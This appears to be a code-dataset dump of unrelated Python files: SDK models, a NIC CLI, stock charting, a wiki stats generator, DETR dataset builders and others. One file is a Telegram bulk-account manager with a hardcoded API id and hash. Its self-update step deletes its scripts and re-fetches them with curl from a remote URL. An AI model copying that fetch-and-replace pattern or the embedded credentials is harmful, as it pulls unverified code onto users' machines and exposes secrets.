periodicity = dictionary.get('periodicity')
rpo_schedule = cohesity_management_sdk.models.rpo_schedule.RpoSchedule.from_dictionary(dictionary.get('rpoSchedule')) if dictionary.get('rpoSchedule') else None
# Return an object of this model
return cls(continuous_schedule,
daily_schedule,
monthly_schedule,
periodicity,
rpo_schedule)
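A brief usage sketch of the model above, assuming the module and its schedule imports are available; the payload is a made-up example and would normally come from a deserialized API response.
# Hypothetical payload; keys follow the _names mapping above.
payload = {'periodicity': 'kDaily'}
policy = SchedulingPolicy.from_dictionary(payload)
print(policy.periodicity)          # -> kDaily
print(policy.continuous_schedule)  # -> None (absent from the payload)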
| 43.152174
| 203
| 0.688917
| 423
| 3,970
| 6.319149
| 0.269504
| 0.041152
| 0.062851
| 0.080808
| 0.195286
| 0.166106
| 0
| 0
| 0
| 0
| 0
| 0.001682
| 0.251134
| 3,970
| 91
| 204
| 43.626374
| 0.89741
| 0.429975
| 0
| 0
| 0
| 0
| 0.125951
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.105263
| 0
| 0.263158
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60a5c5419df750bc2b6508ae2377a189aff71a1a
| 3,575
|
py
|
Python
|
networking_mlnx/eswitchd/cli/ebrctl.py
|
mail2nsrajesh/networking-mlnx
|
9051eac0c2bc6abf3c8790e01917e405dc479922
|
[
"Apache-2.0"
] | null | null | null |
networking_mlnx/eswitchd/cli/ebrctl.py
|
mail2nsrajesh/networking-mlnx
|
9051eac0c2bc6abf3c8790e01917e405dc479922
|
[
"Apache-2.0"
] | null | null | null |
networking_mlnx/eswitchd/cli/ebrctl.py
|
mail2nsrajesh/networking-mlnx
|
9051eac0c2bc6abf3c8790e01917e405dc479922
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# Copyright 2013 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
from networking_mlnx.eswitchd.cli import conn_utils
from networking_mlnx.eswitchd.cli import exceptions
client = conn_utils.ConnUtil()
def parse():
"""Main method that manages supported CLI commands.
The actions that are supported through the CLI are:
write-sys, del-port, allocate-port and add-port.
Each action is matched with a method that should handle it,
e.g. the write-sys action is matched with the write_sys method.
"""
parser = argparse.ArgumentParser(prog='ebrctl')
parser.add_argument('action', action='store_true')
parent_parser = argparse.ArgumentParser(add_help=False)
parent_parser.add_argument('vnic_mac')
parent_parser.add_argument('device_id')
parent_parser.add_argument('fabric')
parent_parser.add_argument('vnic_type')
subparsers = parser.add_subparsers()
parser_add_port = subparsers.add_parser('add-port',
parents=[parent_parser])
parser_add_port.add_argument('dev_name')
parser_add_port.set_defaults(func=add_port)
parser_add_port = subparsers.add_parser('allocate-port',
parents=[parent_parser])
parser_add_port.set_defaults(func=allocate_port)
parser_del_port = subparsers.add_parser('del-port')
parser_del_port.set_defaults(func=del_port)
parser_del_port.add_argument('fabric')
parser_del_port.add_argument('vnic_mac')
parser_write_sys = subparsers.add_parser('write-sys')
parser_write_sys.set_defaults(func=write_sys)
parser_write_sys.add_argument('path')
parser_write_sys.add_argument('value')
args = parser.parse_args()
args.func(args)
def allocate_port(args):
try:
dev = client.allocate_nic(args.vnic_mac, args.device_id,
args.fabric, args.vnic_type)
except exceptions.MlxException as e:
sys.stderr.write("Error in allocate command")
sys.stderr.write(e.message)
sys.exit(1)
sys.stdout.write(dev)
sys.exit(0)
def add_port(args):
try:
dev = client.plug_nic(args.vnic_mac, args.device_id, args.fabric,
args.vnic_type, args.dev_name)
except exceptions.MlxException as e:
sys.stderr.write("Error in add-port command")
sys.stderr.write(e.message)
sys.exit(1)
sys.stdout.write(dev)
sys.exit(0)
def del_port(args):
try:
client.deallocate_nic(args.vnic_mac, args.fabric)
except exceptions.MlxException as e:
sys.stderr.write("Error in del-port command")
sys.stderr.write(e.message)
sys.exit(1)
sys.exit(0)
def write_sys(args):
try:
fd = open(args.path, 'w')
fd.write(args.value)
fd.close()
except Exception as e:
sys.stderr.write("Error in write-sys command")
sys.stderr.write(str(e))
sys.exit(1)
sys.exit(0)
def main():
parse()
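A hedged sketch of driving one of the handlers above directly, without going through the sub-parser; the target path is a placeholder (in real use write-sys points at a sysfs node), and note that the handler calls sys.exit() when it finishes.
import argparse

# Illustrative arguments only; write_sys writes args.value to args.path.
args = argparse.Namespace(path='/tmp/ebrctl-example', value='1')
write_sys(args)   # writes "1" to the path, then exits with status 0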
| 30.555556
| 73
| 0.683636
| 497
| 3,575
| 4.748491
| 0.295775
| 0.045763
| 0.047458
| 0.038983
| 0.434746
| 0.32161
| 0.24661
| 0.205932
| 0.205932
| 0.205932
| 0
| 0.005722
| 0.217902
| 3,575
| 116
| 74
| 30.818966
| 0.83834
| 0.235804
| 0
| 0.323944
| 0
| 0
| 0.083612
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084507
| false
| 0
| 0.056338
| 0
| 0.140845
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60a739a78fd701a33047ec6e80de5f418140cf06
| 2,567
|
py
|
Python
|
src/FinanceLib/analysis.py
|
Chahat-M/FinanceLib
|
0428779220a97e7fe0ad35a50207b737059b9c86
|
[
"MIT"
] | 3
|
2021-06-20T14:55:16.000Z
|
2021-12-29T03:55:34.000Z
|
src/FinanceLib/analysis.py
|
Chahat-M/FinanceLib
|
0428779220a97e7fe0ad35a50207b737059b9c86
|
[
"MIT"
] | null | null | null |
src/FinanceLib/analysis.py
|
Chahat-M/FinanceLib
|
0428779220a97e7fe0ad35a50207b737059b9c86
|
[
"MIT"
] | 1
|
2021-06-26T05:39:08.000Z
|
2021-06-26T05:39:08.000Z
|
from typing import List, Union
import numpy as np
import pandas_datareader as pdr
import pandas as pd
import matplotlib.pyplot as plt
def rsi(symbol :str ,name :str, date :str) -> None :
"""
Calculates and visualises the Relative Strength Index (RSI) of the company's stock.
Parameters:
symbol(str) : Symbol of the company from https://in.finance.yahoo.com/
name(str) : Name of the company
date(str) : start date of historical data in the format (YYYY,M,D)
Returns:
Return type: void
Example:
rsi('GOOG','Google','2020,01,01')
"""
ticker : str = pdr.get_data_yahoo(symbol, date)
delta : List[float] = ticker['Close'].diff()
up : int = delta.clip(lower=0)
down : int = -1*delta.clip(upper=0)
ema_up : Union[bool,float]= up.ewm(com=13, adjust=False).mean()
ema_down : Union[bool,float] = down.ewm(com=13, adjust=False).mean()
rs : float = ema_up/ema_down
ticker['RSI'] = 100 - (100/(1 + rs))
ticker : list = ticker.iloc[14:]
print(ticker)
fig, (ax1, ax2) = plt.subplots(2)
ax1.get_xaxis().set_visible(False)
fig.suptitle(name)
ticker['Close'].plot(ax=ax1)
ax1.set_ylabel('Price ($)')
ticker['RSI'].plot(ax=ax2)
ax2.set_ylim(0,100)
ax2.axhline(30, color='r', linestyle='--')
ax2.axhline(70, color='r', linestyle='--')
ax2.set_ylabel('RSI')
plt.show()
def volatility(symbol :str, date :str) ->None:
"""
Measures and visualizes the volatility of a stock by calculating the Average True Range (ATR).
Parameters:
symbol(str) : Symbol of the company from https://in.finance.yahoo.com/
date(str) : start date of historical data in the format (YYYY,M,D)
Returns:
Return type: void
Example:
volatility('GOOG','2020,01,01')
"""
data : str = pdr.get_data_yahoo(symbol,date)
data.head()
high_low : Union[int,float]= data['High'] - data['Low']
high_cp : List[float] = np.abs(data['High'] - data['Close'].shift())
low_cp : List[float]= np.abs(data['Low'] - data['Close'].shift())
df : List[str] = pd.concat([high_low, high_cp, low_cp], axis=1)
true_range : float= np.max(df, axis=1)
average_true_range : float= true_range.rolling(14).mean()
average_true_range
true_range.rolling(14).sum()/14
fig, ax = plt.subplots()
average_true_range.plot(ax=ax)
ax2 : Union[bool,float]= data['Close'].plot(ax=ax, secondary_y=True, alpha=.3)
ax.set_ylabel("ATR")
ax2.set_ylabel("Price")
plt.show()
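A usage sketch that mirrors the docstring examples above; it assumes network access to the Yahoo Finance endpoint used by pandas_datareader.
if __name__ == "__main__":
    # Same ticker and start date as in the docstring examples.
    rsi('GOOG', 'Google', '2020,01,01')
    volatility('GOOG', '2020,01,01')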
| 34.689189
| 96
| 0.626023
| 382
| 2,567
| 4.123037
| 0.332461
| 0.04
| 0.030476
| 0.017778
| 0.267937
| 0.267937
| 0.213333
| 0.177778
| 0.177778
| 0.177778
| 0
| 0.030923
| 0.218933
| 2,567
| 74
| 97
| 34.689189
| 0.754613
| 0.270355
| 0
| 0.045455
| 0
| 0
| 0.039955
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.113636
| 0
| 0.159091
| 0.022727
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60ae786acbdf645e9d5e08b60bc5b3249a338b60
| 6,496
|
py
|
Python
|
jarvis/stats.py
|
aburgd/sheila
|
556cf3e4a6992b8ba609ba281f5a3657cd91e709
|
[
"MIT"
] | null | null | null |
jarvis/stats.py
|
aburgd/sheila
|
556cf3e4a6992b8ba609ba281f5a3657cd91e709
|
[
"MIT"
] | null | null | null |
jarvis/stats.py
|
aburgd/sheila
|
556cf3e4a6992b8ba609ba281f5a3657cd91e709
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
###############################################################################
# Module Imports
###############################################################################
import pyscp
import textwrap
from dominate import tags as dt
from . import core, lex, ext
###############################################################################
# Templates
###############################################################################
CHART = """
google.charts.setOnLoadCallback({name});
function {name}() {{
var data = new google.visualization.arrayToDataTable([
{data}
]);
var options = {options};
var chart = new google.visualization.{class_name}(
document.getElementById('{name}'));
chart.draw(data, options);
}}
"""
USER = """
[[html]]
<base target="_parent" />
<style type="text/css">
@import url(http://scp-stats.wdfiles.com/local--theme/scp-stats/style.css);
</style>
<script type="text/javascript" src="https://www.gstatic.com/charts/loader.js">
</script>
<script type="text/javascript">
google.charts.load('current', {{'packages':['table', 'corechart']}});
{summary_table}
{articles_chart}
{articles_table}
</script>
<div id="summary_table"></div>
<div id="articles_chart"></div>
<div style="clear: both;"></div>
<h4>Articles</h4>
<div id="articles_table"></div>
[[/html]]
"""
###############################################################################
# Helper Functions
###############################################################################
def html(tag, text, **kwargs):
if 'cls' in kwargs:
kwargs['class'] = kwargs.pop('cls')
attrs = ' '.join('{}="{}"'.format(k, v) for k, v in kwargs.items())
if attrs:
attrs = ' ' + attrs
return '<{tag}{attrs}>{text}</{tag}>'.format(
tag=tag, text=text, attrs=attrs)
###############################################################################
# Chart Classes
###############################################################################
class Chart:
def format_row(self, row, indent):
row = ',\n'.join(map(repr, row))
row = textwrap.indent(row, ' ')
row = '[\n{}\n]'.format(row)
return textwrap.indent(row, ' ' * indent)
def render(self):
data = ',\n'.join([self.format_row(r, 8) for r in self.data])
return CHART.format(
name=self.name,
class_name=self.class_name,
data=data,
options=self.options)
class SummaryTable(Chart):
def __init__(self, pages, name):
self.name = 'summary_table'
self.class_name = 'Table'
self.populate(pages, name)
self.options = {
'sort': 'disable',
'width': '100%'}
def populate(self, pages, name):
self.data = [
['Category', 'Page Count', 'Net Rating', 'Average'],
['Total', pages.count, pages.rating, pages.average]]
for k, v in pages.split_page_type().items():
self.data.append([k, v.count, v.rating, v.average])
for k, v in pages.split_relation(name).items():
self.data.append([k, v.count, v.rating, v.average])
class ArticlesChart(Chart):
def __init__(self, pages, user):
self.name = 'articles_chart'
self.class_name = 'ColumnChart'
self.user = user
self.populate(pages)
self.options = {
'backgroundColor': '#e7e9dc',
'chartArea': {
'left': 0,
'top': 0,
'width': '100%',
'height': '100%'},
'hAxis': {'textPosition': 'none'},
'vAxis': {
'textPosition': 'none',
'gridlines': {'color': '#e7e9dc'},
'minValue': 0},
'legend': {'position': 'none'},
'height': 350,
'tooltip': {'isHtml': 1}}
def populate(self, pages):
self.data = [[
'Title',
'Rating',
{'role': 'tooltip', 'p': {'html': 'true'}},
{'role': 'style'}]]
for p in pages:
if 'scp' in p.tags:
color = 'color: #db4437'
elif 'tale' in p.tags:
color = 'color: #4285f4'
else:
color = 'color: #f4b400'
date = p.metadata[self.user].date[:10] or '-'
tooltip = dt.table(
dt.tr(dt.td(p.title, colspan=2)),
dt.tr(dt.td('Rating:'), dt.td(p.rating)),
dt.tr(dt.td('Created:'), dt.td(date)),
cls='articles_chart_tooltip')
self.data.append([
p.title,
p.rating,
tooltip.render(pretty=False),
color])
class ArticlesTable(Chart):
def __init__(self, pages, user):
self.name = 'articles_table'
self.class_name = 'Table'
self.populate(pages, user)
self.options = {
'showRowNumber': 1,
'allowHtml': 1,
'sortColumn': 1,
'sortAscending': 0,
'width': '100%'}
def populate(self, pages, user):
self.data = ['Title Rating Tags Link Created Role'.split()]
for p in pages:
tags = [html('b', t) if t in 'scp tale hub admin author' else t
for t in p.tags]
tags = ', '.join(sorted(tags))
link = html('a', p.url.split('/')[-1], href=p.url)
role = p.metadata[user].role
role = html('span', role, cls='rel-' + role)
date = p.metadata[user].date[:10]
self.data.append([p.title, p.rating, tags, link, date, role])
###############################################################################
def update_user(name):
wiki = pyscp.wikidot.Wiki('scp-stats')
wiki.auth(core.config.wiki.name, core.config.wiki.password)
p = wiki('user:' + name.lower())
pages = sorted(
core.pages.related(name),
key=lambda x: (x.metadata[name].date, x.created))
pages = ext.PageView(pages)
if not pages.articles:
return lex.not_found.author
data = USER.format(
summary_table=SummaryTable(pages.primary(name), name).render(),
articles_chart=ArticlesChart(pages.articles, name).render(),
articles_table=ArticlesTable(
[p for p in pages if p.tags], name).render())
p.create(data, title=name, comment='automated update')
return p.url
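A small illustration of the html() helper defined above; the link target and class name are arbitrary examples.
# `cls` is translated to the reserved attribute name `class`.
link = html('a', 'SCP-173', href='http://www.scpwiki.com/scp-173', cls='rel-author')
# -> <a href="http://www.scpwiki.com/scp-173" class="rel-author">SCP-173</a>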
| 28.121212
| 79
| 0.475985
| 672
| 6,496
| 4.541667
| 0.287202
| 0.023591
| 0.017038
| 0.006881
| 0.155963
| 0.129423
| 0.111075
| 0.079948
| 0.053735
| 0.026868
| 0
| 0.010487
| 0.26601
| 6,496
| 230
| 80
| 28.243478
| 0.629614
| 0.011853
| 0
| 0.107595
| 0
| 0.012658
| 0.262844
| 0.065053
| 0
| 0
| 0
| 0
| 0
| 1
| 0.063291
| false
| 0.006329
| 0.031646
| 0
| 0.151899
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60b1ecdd22ff60b0f76eb9a849e552628f551e26
| 6,547
|
py
|
Python
|
python/manager.py
|
Kiku-Reise/vsmart
|
dd8cf84816da8734e72dbb46c07694f561597648
|
[
"Apache-2.0"
] | null | null | null |
python/manager.py
|
Kiku-Reise/vsmart
|
dd8cf84816da8734e72dbb46c07694f561597648
|
[
"Apache-2.0"
] | null | null | null |
python/manager.py
|
Kiku-Reise/vsmart
|
dd8cf84816da8734e72dbb46c07694f561597648
|
[
"Apache-2.0"
] | null | null | null |
from telethon.sync import TelegramClient
from telethon.errors.rpcerrorlist import PhoneNumberBannedError
import pickle, os
from colorama import init, Fore
from time import sleep
init()
n = Fore.RESET
lg = Fore.LIGHTGREEN_EX
r = Fore.RED
w = Fore.WHITE
cy = Fore.CYAN
ye = Fore.YELLOW
colors = [lg, r, w, cy, ye]
try:
import requests
except ImportError:
print(f'{lg}[i] Installing module - requests...{n}')
os.system('pip install requests')
def banner():
import random
# fancy logo
b = [
' _____ __',
' / _ \ _______/ |_____________',
' / /_\ \ / ___/\ __\_ __ \__ \\',
'/ | \ \___ \ | | | | \// __ \_',
'\____|__ /____ > |__| |__| (____ /',
' \/ \/ \/'
]
for char in b:
print(f'{random.choice(colors)}{char}{n}')
#print('=============SON OF GENISYS==============')
print(f' Version: 1.2 | Author: Cryptonian{n}\n')
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
while True:
clr()
banner()
print(lg+'[1] Add new accounts'+n)
print(lg+'[2] Filter all banned accounts'+n)
print(lg+'[3] Delete specific accounts'+n)
print(lg+'[4] Update your Astra'+n)
print(lg+'[5] Quit'+n)
a = int(input('\nEnter your choice: '))
if a == 1:
new_accs = []
with open('vars.txt', 'ab') as g:
number_to_add = int(input(f'\n{lg} [~] Enter number of accounts to add: {r}'))
for i in range(number_to_add):
phone_number = str(input(f'\n{lg} [~] Enter Phone Number: {r}'))
parsed_number = ''.join(phone_number.split())
pickle.dump([parsed_number], g)
new_accs.append(parsed_number)
print(f'\n{lg} [i] Saved all accounts in vars.txt')
clr()
print(f'\n{lg} [*] Logging in from new accounts\n')
for number in new_accs:
c = TelegramClient(f'sessions/{number}', 3910389 , '86f861352f0ab76a251866059a6adbd6')
c.start(number)
print(f'{lg}[+] Login successful')
c.disconnect()
input(f'\n Press enter to goto main menu...')
g.close()
elif a == 2:
accounts = []
banned_accs = []
h = open('vars.txt', 'rb')
while True:
try:
accounts.append(pickle.load(h))
except EOFError:
break
h.close()
if len(accounts) == 0:
print(r+'[!] There are no accounts! Please add some and retry')
sleep(3)
else:
for account in accounts:
phone = str(account[0])
client = TelegramClient(f'sessions/{phone}', 3910389 , '86f861352f0ab76a251866059a6adbd6')
client.connect()
if not client.is_user_authorized():
try:
client.send_code_request(phone)
#client.sign_in(phone, input('[+] Enter the code: '))
print(f'{lg}[+] {phone} is not banned{n}')
except PhoneNumberBannedError:
print(r+str(phone) + ' is banned!'+n)
banned_accs.append(account)
if len(banned_accs) == 0:
print(lg+'Congrats! No banned accounts')
input('\nPress enter to goto main menu...')
else:
for m in banned_accs:
accounts.remove(m)
with open('vars.txt', 'wb') as k:
for a in accounts:
Phone = a[0]
pickle.dump([Phone], k)
k.close()
print(lg+'[i] All banned accounts removed'+n)
input('\nPress enter to goto main menu...')
elif a == 3:
accs = []
f = open('vars.txt', 'rb')
while True:
try:
accs.append(pickle.load(f))
except EOFError:
break
f.close()
i = 0
print(f'{lg}[i] Choose an account to delete\n')
for acc in accs:
print(f'{lg}[{i}] {acc[0]}{n}')
i += 1
index = int(input(f'\n{lg}[+] Enter a choice: {n}'))
phone = str(accs[index][0])
session_file = phone + '.session'
if os.name == 'nt':
os.system(f'del sessions\\{session_file}')
else:
os.system(f'rm sessions/{session_file}')
del accs[index]
f = open('vars.txt', 'wb')
for account in accs:
pickle.dump(account, f)
print(f'\n{lg}[+] Account Deleted{n}')
input(f'\nPress enter to goto main menu...')
f.close()
elif a == 4:
# thanks to github.com/th3unkn0n for the snippet below
print(f'\n{lg}[i] Checking for updates...')
try:
# https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt
version = requests.get('https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt')
except:
print(f'{r} You are not connected to the internet')
print(f'{r} Please connect to the internet and retry')
exit()
if float(version.text) > 1.1:
prompt = str(input(f'{lg}[~] Update available[Version {version.text}]. Download?[y/n]: {r}'))
if prompt == 'y' or prompt == 'yes' or prompt == 'Y':
print(f'{lg}[i] Downloading updates...')
if os.name == 'nt':
os.system('del add.py')
os.system('del manager.py')
else:
os.system('rm add.py')
os.system('rm manager.py')
#os.system('del scraper.py')
os.system('curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/add.py')
os.system('curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/manager.py')
print(f'{lg}[*] Updated to version: {version.text}')
input('Press enter to exit...')
exit()
else:
print(f'{lg}[!] Update aborted.')
input('Press enter to goto main menu...')
else:
print(f'{lg}[i] Your Astra is already up to date')
input('Press enter to goto main menu...')
elif a == 5:
clr()
banner()
exit()
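The script above stores one pickled [phone_number] list per account in vars.txt and reads them back by looping until EOFError; a compact sketch of that load pattern as a reusable helper (the helper itself is not part of the script).
import pickle

def load_accounts(path='vars.txt'):
    """Read every pickled [phone_number] record appended to the file."""
    accounts = []
    try:
        with open(path, 'rb') as fh:
            while True:
                accounts.append(pickle.load(fh))
    except (EOFError, FileNotFoundError):
        pass
    return accounts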
| 36.780899
| 109
| 0.494578
| 760
| 6,547
| 4.144737
| 0.264474
| 0.032381
| 0.022857
| 0.028571
| 0.193333
| 0.18254
| 0.136508
| 0.08
| 0.08
| 0.041905
| 0
| 0.022662
| 0.359707
| 6,547
| 177
| 110
| 36.988701
| 0.728769
| 0.040171
| 0
| 0.233129
| 0
| 0.018405
| 0.316075
| 0.022782
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01227
| false
| 0
| 0.04908
| 0
| 0.06135
| 0.159509
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60b2db27faa35c5bbae9711262c54fdad4d8f495
| 1,212
|
py
|
Python
|
src/m2ee/client_errno.py
|
rus-kh/m2ee-tools
|
70000796a53131bb1cd8d199f48cd5e7aab2c505
|
[
"BSD-3-Clause"
] | 23
|
2015-11-26T12:05:45.000Z
|
2022-03-17T10:24:22.000Z
|
src/m2ee/client_errno.py
|
rus-kh/m2ee-tools
|
70000796a53131bb1cd8d199f48cd5e7aab2c505
|
[
"BSD-3-Clause"
] | 54
|
2016-07-26T12:44:07.000Z
|
2022-02-17T10:08:01.000Z
|
src/m2ee/client_errno.py
|
rus-kh/m2ee-tools
|
70000796a53131bb1cd8d199f48cd5e7aab2c505
|
[
"BSD-3-Clause"
] | 34
|
2015-01-04T07:05:48.000Z
|
2022-02-15T10:23:52.000Z
|
#
# Copyright (C) 2009 Mendix. All rights reserved.
#
SUCCESS = 0
# Starting the Mendix Runtime can fail in either a temporary or a permanent way.
# Some of the errors can be fixed with some help of the user.
#
# The default m2ee cli program will only handle a few of these cases, by
# providing additional hints or interactive choices to fix the situation and
# will default to echoing back the error message received from the runtime.
# Database to be used does not exist
start_NO_EXISTING_DB = 2
# Database structure is out of sync with the application domain model, DDL
# commands need to be run to synchronize the database.
start_INVALID_DB_STRUCTURE = 3
# Constant definitions used in the application model are missing from the
# configuration.
start_MISSING_MF_CONSTANT = 4
# In the application database, a user account was detected which has the
# administrative role (as specified in the modeler) and has password '1'.
start_ADMIN_1 = 5
# ...
start_INVALID_STATE = 6
start_MISSING_DTAP = 7
start_MISSING_BASEPATH = 8
start_MISSING_RUNTIMEPATH = 9
start_INVALID_LICENSE = 10
start_SECURITY_DISABLED = 11
start_STARTUP_ACTION_FAILED = 12
start_NO_MOBILE_IN_LICENSE = 13
check_health_INVALID_STATE = 2
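A hedged sketch of how a caller might branch on the start codes above; the hint texts are illustrative and are not the wording used by the m2ee CLI.
def describe_start_result(code):
    """Map a runtime start result code to a short, illustrative hint."""
    hints = {
        SUCCESS: "runtime started",
        start_NO_EXISTING_DB: "database does not exist yet",
        start_INVALID_DB_STRUCTURE: "database structure out of sync, run DDL commands",
        start_MISSING_MF_CONSTANT: "constant definitions missing from the configuration",
        start_ADMIN_1: "administrative account still has password '1'",
    }
    return hints.get(code, "unhandled start error: {}".format(code))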
| 30.3
| 76
| 0.792079
| 194
| 1,212
| 4.778351
| 0.623711
| 0.05178
| 0.03452
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024728
| 0.165842
| 1,212
| 39
| 77
| 31.076923
| 0.892186
| 0.657591
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60b31fb7e46f9a498f1975750fe02489646c609d
| 2,456
|
py
|
Python
|
datasets/__init__.py
|
andrewliao11/detr
|
944bb60e090e6b72aede9574cd2b7f75202cfe05
|
[
"Apache-2.0"
] | null | null | null |
datasets/__init__.py
|
andrewliao11/detr
|
944bb60e090e6b72aede9574cd2b7f75202cfe05
|
[
"Apache-2.0"
] | null | null | null |
datasets/__init__.py
|
andrewliao11/detr
|
944bb60e090e6b72aede9574cd2b7f75202cfe05
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import torch.utils.data
import torchvision
def get_coco_api_from_dataset(dataset_val):
for _ in range(10):
# if isinstance(dataset, torchvision.datasets.CocoDetection):
# break
if isinstance(dataset_val, torch.utils.data.Subset):
dataset_val = dataset_val.dataset
if isinstance(dataset_val, torchvision.datasets.CocoDetection):
return dataset_val.coco
def get_class_mapping(dataset):
for _ in range(10):
# if isinstance(dataset, torchvision.datasets.CocoDetection):
# break
if isinstance(dataset, torch.utils.data.Subset):
dataset = dataset.dataset
if isinstance(dataset, torchvision.datasets.CocoDetection):
return {d["id"]: d["name"].lower() for d in dataset.coco.dataset["categories"]}
def build_dataset(image_set, dataset_args, given_class_mapping=None):
if dataset_args.name in ['mscoco14', 'mscoco17']:
from .coco import build as build_coco
return build_coco(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'virtual_kitti':
from .virtual_kitti import build as build_vkitti
return build_vkitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
#elif dataset_args.name == 'viper':
# from .viper import build as build_viper
# return build_viper(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'kitti':
from .kitti import build as build_kitti
return build_kitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'mixed_kitti_virtual_kitti':
from .mixed_kitti_virtual_kitti import build as build_mixed_kitti_virtual_kitti
return build_mixed_kitti_virtual_kitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'synscapes':
from .synscapes import build as build_synscapes
return build_synscapes(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'cityscapes':
from .cityscapes import build as build_cityscapes
return build_cityscapes(image_set, dataset_args, given_class_mapping=given_class_mapping)
else:
raise ValueError(f'dataset {dataset_args.name} not supported')
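A minimal sketch of the dispatch behaviour above, using a stand-in namespace for the usual argparse arguments; 'imagenet' is deliberately unsupported here to show the error path.
from types import SimpleNamespace

# build_dataset dispatches on dataset_args.name; an unknown name raises ValueError.
try:
    build_dataset('train', SimpleNamespace(name='imagenet'))
except ValueError as err:
    print(err)   # -> dataset imagenet not supported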
| 47.230769
| 112
| 0.733713
| 316
| 2,456
| 5.39557
| 0.199367
| 0.11261
| 0.14956
| 0.08915
| 0.54956
| 0.478592
| 0.41349
| 0.392375
| 0.392375
| 0.392375
| 0
| 0.004014
| 0.188518
| 2,456
| 51
| 113
| 48.156863
| 0.85148
| 0.151873
| 0
| 0.057143
| 0
| 0
| 0.065092
| 0.012054
| 0
| 0
| 0
| 0
| 0
| 1
| 0.085714
| false
| 0
| 0.228571
| 0
| 0.542857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60b3e5f9c1bddecc88bf9ce4ae8e78ecc1b7e1ee
| 11,139
|
py
|
Python
|
dkhomeleague/dkhomeleague.py
|
sansbacon/dkhomeleague
|
17ab695df9ceccf5b7f135181b19ade8d47add5f
|
[
"Apache-2.0"
] | null | null | null |
dkhomeleague/dkhomeleague.py
|
sansbacon/dkhomeleague
|
17ab695df9ceccf5b7f135181b19ade8d47add5f
|
[
"Apache-2.0"
] | null | null | null |
dkhomeleague/dkhomeleague.py
|
sansbacon/dkhomeleague
|
17ab695df9ceccf5b7f135181b19ade8d47add5f
|
[
"Apache-2.0"
] | null | null | null |
# dkhomeleague.py
import json
import logging
import os
from pathlib import Path  # needed by Parser._to_obj below
from string import ascii_uppercase
import pandas as pd
from requests_html import HTMLSession
import browser_cookie3
import pdsheet
class Scraper:
"""scrapes league results"""
def __init__(self, league_key=None, username=None):
"""Creates instance
Args:
league_key (str): id for home league
username (str): your username
Returns:
Scraper
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.league_key = league_key if league_key else os.getenv('DK_LEAGUE_KEY')
